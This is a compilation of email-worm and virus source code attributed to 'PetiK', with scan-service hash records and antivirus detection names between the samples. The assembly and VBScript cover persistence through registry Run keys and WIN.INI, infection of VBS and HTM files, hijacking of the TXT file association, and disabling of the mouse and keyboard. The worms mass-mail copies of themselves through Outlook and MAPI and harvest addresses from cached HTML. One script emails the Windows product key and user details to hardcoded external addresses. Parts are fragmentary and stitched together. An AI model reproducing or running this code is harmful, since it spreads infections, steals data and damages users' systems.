db 'F.Attachments.Add G.BuildPath(G.GetSpecialFolder(1),"Winmine.exe")',0dh,0ah
db 'F.DeleteAfterSubmit=True',0dh,0ah
db 'If F.To <> "" Then',0dh,0ah
db 'F.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',00h
VBSTAILLE equ $-vbsd
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>
end DEBUT
end
File Winmine.exe received on 05.10.2009 23:52:01 (CET)
Additional information
File size: 6656 bytes
MD5...: 23f6db768eacfa01a352a657acb26c9b
SHA1..: bc83ebddddead5521afeefd9e9df47e342f05153
' Name : VBS.Seven.A
' Author : PetiK
' Date : June 16th 2001
' Size : 3626 byte
' Action : It copies itself to \WINDOWS\Seven.vbs, \WINDOWS\SYSTEM\Envy.vbs,
' and \WINDOWS\TEMP\Lust.vbs. It adds values in Run key (Envy) and in
' Runservices key (Lust). When the current day is 1st, 15th or 30th it adds
' value in Run key of HKCU (Anger=rundll32 mouse,disable). That disable
' the mouse in each start. When the current day is 12th or 28th it displays a
' message box. It closes Windows when the user click on “OK”.
' When the day is 14th it shows an other message it displays a message.
' When the user click on “OK”, the worm disables the keyboard.
' when the day is 5th or 17th, it changes some values in regedit. When the
' user want open a TXT file, “\WINDOWS\Seven.vbs” starts. The VBS icon is
' replaced by the TXT icon.
' It infects after all VBS files that it founds on the disk and adds some
' at the end of the file to run \WINDOWS\Seven.vbs when the file is ran.
' The worm ues Outlook to spread too :
' Subject : What is the seven sins ??
' Body : Look at this file and learn them.
' Attached : Seven.vbs
'VBS.Seven.A
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set tmp=fso.GetSpecialFolder(2)
SEVEN()
Sub SEVEN()
Set org=fso.GetFile(WScript.ScriptFullname)
org.Copy(win&"\Seven.vbs")
org.Copy(sys&"\Envy.vbs")
org.Copy(tmp&"\Lust.vbs")
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Envy")
runs=("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Lust")
ws.RegWrite run,sys&"\Envy.vbs"
ws.RegWrite runs,tmp&"\Lust.vbs"
First()
Second()
Third()
Disk()
Send()
End Sub
Sub First()
If Day(Now)=1 or Day(Now)=15 or Day(Now)=30 Then
run2=("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Anger")
ws.RegWrite run2,"rundll32 mouse,disable"
End If
End Sub
Sub Second()
If Day(Now)=12 or Day(Now)=28 Then
MsgBox "You're tired now"+VbCrLf+"Switch off you're Computer",vbExclamation,"Seven"
ws.Run "rundll32.exe user.exe,exitwindows"
End If
If Day(Now)=14 Then
MsgBox "The keyboard is on strike !",vbInformation,"Seven"
ws.Run "rundll32 keyboard,disable"
End If
End Sub
Sub Third()
If Day(Now)=5 or Day(Now)=17 Then
bur=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Sh
ell Folders\Desktop")
if not fso.FileExists(win&"\COPYRIGHT.txt.vbs") Then
txt=ws.RegRead("HKCR\txtfile\shell\open\command\")
ws.RegWrite "HKCR\txtfile\shell\open\command\Pride",txt
ws.RegWrite "HKCR\txtfile\shell\open\command\","wscript "&win&"\Seven.vbs"
icot=ws.RegRead("HKCR\txtfile\DefaultIcon\")
icov=ws.RegRead("HKCR\VBSfile\DefaultIcon\")
ws.RegWrite "HKCR\VBSfile\DefaultIcon\oldicon",icov
ws.RegWrite "HKCR\VBSfile\DefaultIcon\",icot
Set copy=fso.CreateTextFile (bur&"\COPYRIGHT.txt.vbs")
copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" By PetiK
(c)2001"",vbcritical,""VBS.Seven.A"""
copy.Close
Set copy=fso.CreateTextFile (win&"\COPYRIGHT.txt.vbs")
copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" By PetiK
(c)2001"",vbcritical,""VBS.Seven.A"""
copy.Close
end if
End If
End Sub
Sub Disk
Set dr=fso.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
list(d.path&"\")
end If
Next
End Sub
Sub infect(dossier)
Set f=fso.GetFolder(dossier)
Set fc=f.Files
For each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
If (ext="vbs") Then
Set cot=fso.OpenTextFile(f1.path, 1, False)
If cot.ReadLine <> "'VBS.Seven.A" then
cot.Close
Set cot=fso.OpenTextFile(f1.path, 1, False)
vbsorg=cot.ReadAll()
cot.Close
Set inf=fso.OpenTextFile(f1.path,2,True)
inf.WriteLine "'VBS.Seven.A"
inf.Write(vbsorg)
inf.WriteLine ""
inf.WriteLine "Set w=CreateObject(""WScript.Shell"")"
inf.WriteLine "Set f=CreateObject(""Scripting.FileSystemObject"")"
inf.WriteLine "w.run f.GetSpecialFolder(0)&""\Seven.vbs"""
inf.Close
End If
End If
Next
End Sub
Sub list(dossier)
Set f=fso.GetFolder(dossier)
Set sf=f.SubFolders
For each f1 in sf
infect(f1.path)
list(f1.path)
Next
End Sub
Sub Send()
Set A=CreateObject("Outlook.Application")
Set B=A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.count
Set E=C.AddressEntries(D)
Set F=A.CreateItem(0)
F.To=E.Address
F.Subject="What is the seven sins ??"
F.Body="Look at this file and learn them."
Set G=CreateObject("Scripting.FileSystemObject")
F.Attachments.Add G.BuildPath(G.GetSpecialFolder(0),"Seven.vbs")
F.DeleteAfterSubmit=True
If F.To <> "" Then
F.Send
End If
Next
End If
Next
End Sub
File Seven.vbs received on 05.16.2009 19:29:21 (CET)
Additional information
File size: 3626 bytes
MD5...: 8781b9a791c0c144e97a466486f6ef33
SHA1..: 6872bc5747eb4701e579305c68c517e712f680ec
comment #
Name : I-Worm.Loft
Author : PetiK
Date : June 16th - June 22nd
Size : 8704 byte
Action : If the file is not \WINDOWS\SYSTEM\LOFT.EXE, it copies to this file and alters
the run= line in the WIN.INI file to run in each start. It copies to
\WINDOWS\LOFT_STORY.EXE too
Otherwise, it checks if exists the key HKCU\Software\Microsoft\PetiK. If not exists, the
worm creates the file "Loft.htm" in the StartUp folder. When the user will accept the
ActiveX of this page, It modifies the start page of Internet Explorer to download the
file ActiveX.vbs.
This file send differents information about the computer to three addresses :
loftptk@multimania(castaldi), petik@multimania.com(vlad14) and euphoria@ctw.net(pk29a).
It displays a message all the 28th of the month and modifies the start page of internet
and RegisteredOwner and RegisteredOrganization. It check if exist a internet connection.
If not exist, it makes a loop all the five seconds or else it displays a message.
It scans after all *.htm* file in the "Temporary Internet Files" to find email address.
#
.586p
.model flat
.code
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT:
VERIF: push 00h
callx GetModuleHandleA
push 50
push offset szOrig
push eax
callx GetModuleFileNameA
push 50h
push offset szCopie
callx GetSystemDirectoryA
@pushsz "\LOFT.EXE"
push offset szCopie
callx lstrcat
push 50h
push offset szCopieb
callx GetWindowsDirectoryA
@pushsz "\LOFT_STORY.EXE"
push offset szCopieb
callx lstrcat
WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
@pushsz "\\WIN.INI"
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
@pushsz "run"
@pushsz "windows"
callx WritePrivateProfileStringA
MESSAGE:push 1040h
@pushsz "Loft Story"
@pushsz "I'm fucking the Loft Story"
push 00h
callx MessageBoxA
jmp FIN
push [RegHandle]
callx RegCloseKey
push [RegHandle]
callx RegCloseKey
parse_html:
pushad
push 00h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 00h
push FILE_SHARE_READ
push GENERIC_READ
push offset HTM.FileName
callx CreateFileA ;open the file
inc eax
je FIN
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA ;create the file mapping
test eax,eax
je ph_close
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
callx MapViewOfFile ;map the file
test eax,eax
je ph_close2
xchg eax,esi
push 00h
push ebx
callx GetFileSize ;get its size
xchg eax,ecx
jecxz ph_close3
ls_scan_mail:
call @mt
db 'mailto:'
@mt: pop edi
l_scan_mail:
pushad
push 7
pop ecx
rep
cmpsb ;search for "mailto:"
popad ;string
je scan_mail ;check the mail address
inc esi
loop l_scan_mail ;in a loop
ph_close3:
push esi
callx UnmapViewOfFile ;unmap view of file
ph_close2:
push ebp
callx CloseHandle ;close file mapping
ph_close:
push ebx
callx CloseHandle ;close the file
popad
ret
scan_mail:
xor edx,edx
add esi,7
mov edi,offset mail_address ;where to store the
push edi ;mail address
n_char: lodsb
cmp al,' '
je s_char
cmp al,'"'
je e_char
cmp al,''''
je e_char
cmp al,'@'
jne o_a
inc edx
o_a: stosb
jmp n_char
s_char: inc esi
jmp n_char
e_char: xor al,al
stosb
pop edi
test edx,edx ;if EDX=0, mail is not
je ls_scan_mail ;valid (no '@')
call mapi_init
test eax,eax
jne ls_scan_mail
call send
call close
jmp ls_scan_mail
mapi_init:
xor eax,eax
push offset MAPIHandle
push eax
push eax
push eax
push eax
push eax
callx MAPILogon
ret
.data
htmd: db '<html><head><title>Loft Story WEB Page</title></head>',0dh,0ah
db '<font face=''verdana'' color=green size=''2''>Please accept ActiveX '
db 'to see this page<br><br> Internet Explorer<br><br> </font>',0dh,0ah
db '<SCRIPT Language=VBScript>',0dh,0ah
db 'On Error Resume Next',0dh,0ah
db 'Set w=CreateObject("WScript.Shell")',0dh,0ah
db 'w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ActiveX 1.0",'
db '"C:\ActiveX.vbs"',0dh,0ah
db 'w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Download Directory",'
db '"C:\"',0dh,0ah
db 'document.write "Please download the file ""ActiveX.vbs"" to correct a bug '
db 'in Internet Explorer"',0dh,0ah
db 'document.write "<br>Connect you to internet to download the file<br>"',0dh,0ah
db 'document.write "<br><h2>If you don''t accept ActiveX the syntax
failed<h2>"',0dh,0ah
db 'w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",'
db '"http://www.ctw.net/euphoria/ActiveX.vbs"',0dh,0ah
db '</SCRIPT></body></html>',0dh,0ah
HTMTAILLE equ $-htmd
sMessage dd ?
dd offset subject
dd offset body
dd ?
dd offset date
dd ?
dd 2
dd offset mFrom
dd 1
dd offset mTo
dd 1
dd offset attach
mFrom dd ?
dd ?
dd offset mFrom
dd offset sender
dd ?
dd ?
mTo dd ?
dd 1
dd offset mTo
dd offset mail_address
dd ?
dd ?
attach dd ?
dd ?
dd ?
dd offset szCopieb
dd ?
dd ?
filetime struct
LowDateTime dd ?
HighDateTime dd ?
filetime ends
win32 struct
Fileattributes dd ?
CreationTime filetime ?
LastAccessTime filetime ?
LastWriteTime filetime ?
FileSizeHigh dd ?
FileSizeHow dd ?
Reserved0 dd ?
Reserved1 dd ?
FileName dd 260 (?)
AlternativeName db 13 dup (?)
db 3 dup (?)
win32 ends
HTM win32 <>
end DEBUT
end
ACTIVEX.VBS
CN=CreateObject("WScript.NetWork").ComputerName
UN=CreateObject("WScript.NetWork").UserName
UD=CreateObject("WScript.NetWork").UserDomain
NOM=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ENT=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
PI=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
PK=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
V=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
VN=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
P=w.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage")
Set O=CreateObject("Outlook.Application")
Set m=O.CreateItem(0)
m.To = "loftptk@multimania.com"
m.BCC = "petik@multimania.com; euphoria@ctw.net"
m.Subject="Loft Info arrivant de " & P
n = "Date : " & date
n = n & VbCrLf & "Heure : " & time
n = n & VbCrLf & "Nom d'enregistrement : " & NOM
n = n & VbCrLf & "Nom de l'organization : " & ENT
n = n & VbCrLf & "Numéro d'identification : " & PI
n = n & VbCrLf & "Numéro d'enregistrement : " & PK
n = n & VbCrLf & "Version de Windows : " & V & " " & VN
n = n & VbCrLf & "Nom de l'ordinateur : " & CN
n = n & VbCrLf & "Nom de domaine : " & UD
n = n & VbCrLf & "Nom d'utilisateur : " & UN
m.Body = n
m.DeleteAfterSubmit=True
m.Send
w.RegWrite "HKCU\Software\Microsoft\PetiK\LoftInfo","OK"
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.yahoo.fr"
File Loft.exe received on 05.16.2009 17:51:42 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.8704.B
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.14
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!cec4
Avast 4.8.1335.0 2009.05.15 Win32:Petik-LoftStory
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.F
BitDefender 7.2 2009.05.16 Win32.Ltof.A@mm
CAT-QuickHeal 10.00 2009.05.15 W32.Petik.K
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.K
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8704
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.8704.B
F-Prot 4.4.4.56 2009.05.16 W32/Malware!cec4
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.E
GData 19 2009.05.16 Win32.Ltof.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.14
Microsoft 1.4602 2009.05.16 Worm:Win32/PetTick@mm
NOD32 4080 2009.05.15 Win32/Petik.K
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8704.B
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.8704
Panda 10.0.0.14 2009.05.16 W32/Petik.K
PCTools 4.4.2.0 2009.05.16 HTML.Loft.A
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.i
Sophos 4.41.0 2009.05.16 W32/Petik-K
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.8704.B
VirusBuster 4.6.5.0 2009.05.16 HTML.Loft.A
Additional information
File size: 8704 bytes
MD5...: ee8e03e0a5251a340fe2c08fd7f9c2e4
SHA1..: 4144791ec8571744fe9905309bb6bf7199485a37
' Name : VBS.Delirious
' Author : PetiK
' Language : VBS
' Date : 28/06/2001
Set cpy=sf.GetFile(WScript.ScriptFullName)
cpy.Copy(win&"\Delirious.vbs")
r=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Delire")
ws.RegWrite r,(win&"\Delirious.vbs")
Disque()
Word()
Spread()
If Day(Now)=1 Then
MsgBox "Look at my new virus !"+VbCrLf+"Delirious, isn't
it ??",vbinformation,"VBS.Delirious coded by PetiK (c)2001"
End If
bureau=ws.SpecialFolders("Desktop")
Set link=ws.CreateShortCut(bureau&"\Site_Web.url")
link.TargetPath="http://www.jememarre.com"
link.Save
End If
Sub Disque
If not sf.FileExists (sys&"\DeliriousFile.txt") Then
Set DF=sf.CreateTextFile(sys&"\DeliriousFile.txt")
DF.WriteLine "Infected file by VBS.Delirious"
DF.WriteLine "Fichiers infectés par VBS.Delirious :"
DF.WriteBlankLines(1)
DF.Close
End If
Set dr=sf.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub
Sub infection(dossier)
Set f=sf.GetFolder(dossier)
Set fc=f.Files
For Each F in fc
ext=sf.GetExtensionName(F.path)
ext=lcase(ext)
If (ext="vbs") Then
Set verif=sf.OpenTextFile(F.path, 1, False)
If verif.ReadLine <> "'VBS.Delirious" Then
tout=verif.ReadAll()
verif.Close
Set inf=sf.OpenTextFile(F.path, 2, True)
inf.Write(virus)
inf.Write(tout)
inf.Close
Set DF=sf.OpenTextFile(sys&"\DeliriousFile.txt", 8, True)
DF.WriteLine F.path
DF.Close
End If
End If
Next
End Sub
Sub liste(dossier)
Set f=sf.GetFolder(dossier)
Set sd=f.SubFolders
For Each F in sd
infection(F.path)
liste(F.path)
Next
End Sub
Sub Word()
On Error Resume Next
Set CODE=sf.CreateTextFile(sys&"\DeliriousCode.txt")
CODE.Write(virus)
CODE.Close
If ws.RegRead("HKLM\Software\Microsoft\Delirious\InfectNormal") <> "OK" Then
Set wrd=WScript.CreateObject("Word.Application")
wrd.Visible=False
Set NorT=wrd.NormalTemplate.VBProject.VBComponents
NorT.Import sys&"\DeliriousCode.txt"
wrd.Run "Normal.ThisDocument.AutoExec"
wrd.Quit
ws.RegWrite "HKLM\Software\Microsoft\Delirious\InfectNormal","OK"
End If
End Sub
Sub Spread()
WHO=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
Set OA=CreateObject("Outlook.Application")
Set MA=OA.GetNameSpace("MAPI")
For Each C In MA.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set AD=C.AddressEntries(D)
Set EM=OA.CreateItem(0)
EM.To=AD.Address
EM.Subject="Delirious EMail from " & WHO
body="Hi " & AD.Name & ","
body = body & VbCrLf & "Look at this funny attached."
body = body & VbCrLf & ""
body = body & VbCrLf & " Best Regards " & WHO
EM.Body=body
EM.Attachments.Add(win&"\Delirious.vbs")
EM.DeleteAfterSubmit=True
If EM.To <> "" Then
EM.Send
End If
Next
End If
Next
End Sub
File Delirious.vbs received on 05.16.2009 11:30:16 (CET)
Additional information
File size: 3112 bytes
MD5...: 6e8ba64159c0520ecd7781951dd11fca
SHA1..: 3a176e6646fd14f44074dd9d59122278bafe608c
SHA256: bd2901cb43b873fb0ba5573641a56d24c066069302c7e275555665b12c86a2d8
comment #
Name : I-Worm.Bush
Author : PetiK
Date : July 1st
Size : 8192 byte
Action : If the file is not \WINDOWS\SYSTEM\BIOS.EXE, it copies to this file and alters
the run=
line in the WIN.INI file to run in each start. It copies to \WINDOWS\Bush.exe too
Otherwise, it creates \WINDOWS\Carnet.vbs and executed it. It adds a value in Reun key to
run this file in each start. If the file exists, it makes nothing.
After, it checks if the user is connected. If it finds a connection, it displays a
message and send a copy of him to the addresses found with the VBS file.
At the end, it attacks the site of G.W.Bush on the Wednesday.
To compil :
tasm32 /M /ML Bush
tlink32 -Tpe -aa -x Bush,,,import32
C:\TASM32\BIN\brc32 bush.rc
#
.586p
.model flat
.code
callx macro a
extrn a:proc
call a
endm
include useful.inc
push 50h
push offset szCopie
callx GetSystemDirectoryA
@pushsz "\BIOS.EXE"
push offset szCopie
callx lstrcat
push 50h
push offset szCopieb
callx GetWindowsDirectoryA
@pushsz "\Bush.exe"
push offset szCopieb
callx lstrcat
WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
@pushsz "\\WIN.INI"
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
@pushsz "run"
@pushsz "windows"
callx WritePrivateProfileStringA
MESSAGE:push 30h
@pushsz "Error Load Library"
@pushsz "Cannot run the Dynamic Link Library GWBios.dll"
push 00h
callx MessageBoxA
jmp FIN
CAR_A: push 50
push offset szCarnet
callx GetWindowsDirectoryA
@pushsz "\Carnet.vbs"
push offset szCarnet
callx lstrcat
push 00h
push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset szCarnet
callx CreateFileA
cmp eax,-1
je DLL
mov [FH],eax
push 00h
push offset octets
push VBSTAILLE
push offset vbsd
push [FH]
callx WriteFile
push [FH]
callx CloseHandle
TXT: pushad
push 50
push offset szCarnet2
callx GetWindowsDirectoryA
@pushsz "\Carnet.txt"
push offset szCarnet2
callx lstrcat
push 00h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 00h
push FILE_SHARE_READ
push GENERIC_READ
push offset szCarnet2
callx CreateFileA
cmp eax,-1
je RETOUR
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je CL1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
callx MapViewOfFile
test eax,eax
je CL2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
xchg eax,ecx
jecxz CL3
d_scan_mail:
call @mlt
db 'mailto:'
@mlt: pop edi
scn_mail:
pushad
push 07h
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop scn_mail
scan_mail:
xor edx,edx
add esi,7 ;size of the string MAILTO:
mov edi,offset m_addr
push edi
p_car: lodsb
cmp al,' '
je car_s
cmp al,'"'
je car_f
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_car
car_s: inc esi
jmp p_car
car_f: xor al,al
stosb
pop edi
test edx,edx ;if edx=0 no @
je d_scan_mail
call send
jmp d_scan_mail
.data
szCarnet db 50 dup (0)
szCarnet2 db 50 dup (0)
szCopie db 50 dup (0)
szCopieb db 50 dup (0)
szOrig db 50 dup (0)
szWinini db 50 dup (0)
FH dd ?
octets dd ?
hdll dd ?
netcheck dd ?
setvalue dd ?
shfolder dd ?
m_addr db 128 dup (?)
Temp dd 0
MAPIh dd 0
sMessage dd ?
dd offset subject
dd offset body
dd ?
dd offset date
dd ?
dd 2
dd offset mFrom
dd 1
dd offset mTo
dd 1
dd offset attach
mFrom dd ?
dd ?
dd offset mFrom
dd offset sender
dd ?
dd ?
mTo dd ?
dd 1
dd offset mTo
dd offset m_addr
dd ?
dd ?
attach dd ?
dd ?
dd ?
dd offset szCopieb
dd ?
dd ?
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set w=CreateObject("WScript.Shell")',0dh,0ah
db 'If not f.FileExists (f.GetSpecialFolder(0)&"\Carnet.txt") Then',0dh,0ah
db 'Set cr=f.CreateTextFile(f.GetSpecialFolder(0)&"\Carnet.txt")',0dh,0ah
db 'cr.Close',0dh,0ah
db 'End If',0dh,0ah
db 'Set OA=CreateObject("Outlook.Application")',0dh,0ah
db 'Set MA=OA.GetNameSpace("MAPI")',0dh,0ah
db 'For each A In MA.AddressLists',0dh,0ah
db 'If A.Addressentries.Count <> 0 Then',0dh,0ah
db 'For B=1 To A.AddressEntries.Count',0dh,0ah
db 'Set C=A.AddressEntries(B)',0dh,0ah
db 'If w.RegRead ("HKCU\Software\Bush\" & C.Address) <> "OK" Then',0dh,0ah
db 'Set car=f.OpenTextFile(f.GetSpecialFolder(0)&"\Carnet.txt", 8, True)',0dh,0ah
db 'car.WriteLine """mailto:" & C.Address & """"',0dh,0ah
db 'car.Close',0dh,0ah
db 'w.RegWrite "HKCU\Software\Bush\" & C.Address,"OK"',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
VBSTAILLE equ $-vbsd
end DEBUT
end
File Bush.exe received on 05.16.2009 11:20:57 (CET)
Additional information
File size: 9216 bytes
MD5...: 1defedea5174374180d660693622fb90
SHA1..: f8047ed4d150dfd6ae9e8fd5cd6146c960570f1b
comment #
Name : I-Worm.MaLoTeYa
Author : PetiK
Date : July 2nd - July 6th
Size : 12288 byte
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
;----------------------------------------
;Installation of the worm in the computer
;----------------------------------------
DEBUT:
VERIF: push 00h
callx GetModuleFileNameA
push 50h
push offset szOrig
push eax
callx GetModuleFileNameA
push 50h
push offset szCopie
callx GetWindowsDirectoryA
@pushsz "\RUNW32.EXE"
push offset szCopie
callx lstrcat
push 50h
push offset szCopb
callx GetSystemDirectoryA
@pushsz "\MSVA.EXE"
push offset szCopb
callx lstrcat
WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
@pushsz "\\WIN.INI"
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
@pushsz "run"
@pushsz "windows"
callx WritePrivateProfileStringA
;--------------------------------------------------
;Create VARegistered.htm file in the StartUp folder
;--------------------------------------------------
C_GET: @pushsz "SHELL32.dll"
callx LoadLibraryA
mov SHELLhdl,eax
@pushsz "SHGetSpecialFolderPathA"
push SHELLhdl
callx GetProcAddress
mov getfolder,eax
push 00h
push 07h ; STARTUP Folder
push offset StartUp
push 00h
call [getfolder]
test eax,eax
je F_HTM
@pushsz "\VARegistered.htm"
push offset StartUp
callx lstrcat
D_INF: push 50
push offset szCurrent
callx GetCurrentDirectoryA
push offset szCurrent
callx SetCurrentDirectoryA
;---------------------------------------------
;Infect all *.htm* files of the Windows folder
;---------------------------------------------
FFF: push offset Search
@pushsz "*.htm*" ; Search some *.htm* files...
callx FindFirstFileA
inc eax
je F_INF
dec eax
mov [htmlHdl],eax
PAYS: push 50
push offset szSystemini
callx GetWindowsDirectoryA
@pushsz "\Win.ini"
push offset szSystemini
callx lstrcat
push offset szSystemini
push 20
push offset org_pays
push offset Default
@pushsz "sCountry"
@pushsz "intl"
callx GetPrivateProfileStringA
;------------------------------------------------------------------
; Send the name of country to "petik@multomania.com" (perhaps bugs)
;------------------------------------------------------------------
SMTP: push offset WSA_Data ; Winsock
push 0101h ; ver 1.1 (W95+)
callx WSAStartup
or eax,eax
jnz INIT
@pushsz "obelisk.mpt.com.uk"
callx gethostbyname ; convert SMTP Name to an IP address
xchg ecx,eax
jecxz FREE_WIN ; Error ?
mov esi,[ecx+12] ; Fetch IP address
lodsd
push eax
pop [ServIP]
call @2 ; Time-out:
Time_Out: dd 5 ; Seconds
dd 0 ; Milliseconds
@2:
push eax ; Not used (Error)
push eax ; Not used (Writeability)
call @3
Socket_Set: dd 1 ; Socket count
work_socket dd 0 ; Socket
@3:
push eax ; Unused
callx select
dec eax
jnz CLOSE_SOC
push 00h
push 512 ; Received data from socket
push offset buf_recv
push [work_socket]
callx recv
xchg ecx,eax ; Connection closed ?
jecxz CLOSE_SOC
inc ecx ; Error ?
jz CLOSE_SOC
or ebx,ebx ; Received stuff was QUIT
jz CLOSE_SOC ; reply ? then close up.
mov al,'2' ; "OK" reply
cmp bl,2 ; Received stuff was the DATA
jne Check_Reply ; reply ?
inc eax
Check_Reply: scasb
je Wait_Ready
lea esi,Send_M + (5*4)
mov bl,1
Wait_Ready:
xor ecx,ecx
lea eax,Time_Out
push eax
push ecx ; not used (Error)
lea eax,Socket_Set
push eax ; Writeability
push ecx ; Not used (Readability)
push ecx ; Unused
callx select
dec eax ; Time-ouit ??
jnz CLOSE_SOC
cld
lodsd
movzx ecx,ax
shr eax,16
add eax,ebp
CLOSE_SOC:
push [work_socket]
callx closesocket
FREE_WIN:
callx WSACleanup
;-----------------------------------------------------------
; Search email addresses into the "Temporary Internet Files"
;-----------------------------------------------------------
FFF2: push offset Search
@pushsz "*.htm*"
callx FindFirstFileA
inc eax
je END_SPREAD
dec eax
mov [htmlHdl],eax
END_SPREAD:
push [MAPIhdl]
callx FreeLibrary
;---------------------------------------------------------------
; Changes the title of the System Properties window on Wednesday
;---------------------------------------------------------------
DATE: push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],3
jne FIN
WIN1: @pushsz "Propriétés Systême"
push 00h
callx FindWindowA
test eax,eax
jz WIN2
jmp WIN3
WIN2: @pushsz "System Properties" ; Change title some windows
push 00h
callx FindWindowA
test eax,eax
jz WIN1
WIN3: mov edi,eax
@pushsz "PetiK always is with you :-)"
push edi
callx SetWindowTextA
jmp WIN1
FIN: push 00h
callx ExitProcess
infect: pushad
mov esi,offset Search.cFileName
push esi
callx GetFileAttributesA
cmp eax,1
je end_infect
push 00h
push 80h
push 03h
push 00h
push 01h
push 40000000h
push esi
callx CreateFileA
xchg eax,edi
inc edi
je end_infect
dec edi
push 02h ; FILE_END
push 00h
push [Dist]
push edi
callx SetFilePointer
push 00h
push offset octets
push HTMSIZE
push offset d_htm
push edi
callx WriteFile
push edi
callx CloseHandle
push 01h ; READONLY
push esi
callx SetFileAttributesA
end_infect: popad
ret
infect2:pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset Search.cFileName
inc eax
je END_SPREAD
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
